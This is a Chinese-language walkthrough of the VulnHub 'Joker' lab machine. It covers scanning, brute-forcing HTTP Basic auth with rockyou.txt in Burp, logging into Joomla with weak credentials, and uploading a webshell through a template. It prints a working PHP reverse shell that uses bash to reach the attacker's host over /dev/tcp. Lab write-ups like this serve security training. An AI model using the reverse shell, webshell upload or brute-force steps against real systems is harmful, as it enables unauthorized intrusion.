当前位置: 首页 > article >正文

VulnHub-Joker通关攻略

一、信息收集

第一步:确定靶机IP为192.168.0.106

第二步:扫描后台及开放端口

#开放端口
22 --- ssh
25 --- SMTP简单邮件传输协议
80 --- HTTP万维网传输信息协议
110 --- POP3邮件协议3
8080 --- Internet 信息服务
第三步:进行敏感目录及文件扫描

DIRECTORY:http://192.168.0.106/css/
DIRECTORY:http://192.168.0.106/img/
http://192.168.0.106/index.html(CODE:200ISIZE:5954)
http://192.168.0.106/phpinfo.php(CODE:200ISIZE:94857)
http://192.168.0.106/server-status(CODE:403ISIZE:278)
第四步:进一步进行dirb扫描,发现secret.txt

第五步:访问8080端口,出现登录框

二、网站爆破

第一步:在secret.txt中多次出现rock,猜测指的是kali中自带的rockyou.txt字典,着手尝试bp抓包,爆破登录8080端口网站

#从互联网上手动下载 rockyou.txt
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

#下载完成后,将文件移动到 /usr/share/wordlists/ 目录下
sudo mv rockyou.txt /usr/share/wordlists/

#验证文件是否真的存在于指定位置
ls /usr/share/wordlists/rockyou.txt
第二步:生成字典

head -n 100 /usr/share/wordlists/rockyou.txt > test.txt
//从字典文件 /usr/share/wordlists/rockyou.txt 中提取前 100 行内容,并将这些内容重定向输出到一个名为 test.txt 的新文件里。如果 test.txt 文件不存在,该命令会创建此文件;若文件已存在,则会覆盖原文件内容
第三步:抓包,对basic后面的字符串进行解码,得到账号密码格式为“用户名:密码”

第四步:发送到攻击模块,添加payload,将前面生成的字典test.txt移动至物理机,导入

第五步:添加前缀、添加64位编码、取消勾选url编码字符

第六步:开始攻击,进行64位解码,得到账号密码joker:hannah

第七步:登录成功,同时发现该站点使用了joomlaCMS

第八步:尝试弱口令登录,多次尝试有发现此处用户名和密码均为joomla,登录成为Super User

第九步:在用户菜单点击Site Administrator,登陆后台

三、Getshell

第一步:在插件下的模板处发现漏洞,上传一句话木马

第二步:使用蚁剑进行连接,连接成功

第三步:反弹shell,新建fandanshell.php,写入代码,将shell反弹至Kali的6666端口

#fandanshell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/6666 0>&1'");?>

                                                                                                                                FROM  IYU_


http://www.kler.cn/a/591304.html

相关文章:

  • 微信小程序实现根据不同的用户角色显示不同的tabbar并且可以完整的切换tabbar
  • 【一起学Rust | Tauri2.0框架】基于 Rust 与 Tauri 2.0 框架实现生物识别(指纹识别)应用
  • Arch Linux高性能数据处理优化指南
  • C++ 学习笔记(三)—— 入门+类和对象
  • 【PDF识别】总结PDF文本内容与表格提取的方法
  • 招聘信息|基于SprinBoot+vue的招聘信息管理系统(源码+数据库+文档)
  • 如何才能避免漏测事故的发生?
  • 《港口危货储存单位主要安全管理人员》考试资料及答案解析
  • C# WPF编程-RepeatButton
  • opencv + opengl显示摄像头视频流
  • PyCharm 2019.1.3使用python3.9创建虚拟环境setuptools-40.8.0报错处理
  • 单臂路由+VLANIF
  • 【论文阅读】FairCLIP - 医疗视觉语言学习中的公平性提升
  • 实战设计模式之解释器模式
  • DolphinScheduler工作流任务调度集群部署
  • 联邦学习(Federated Learning)
  • 深度学习 Deep Learning 第2章 线性代数
  • Vue渲染函数 - render 函数
  • Business processes A bridge to SAP and a guide to SAP TS410 certification
  • Python简单爬虫实践案例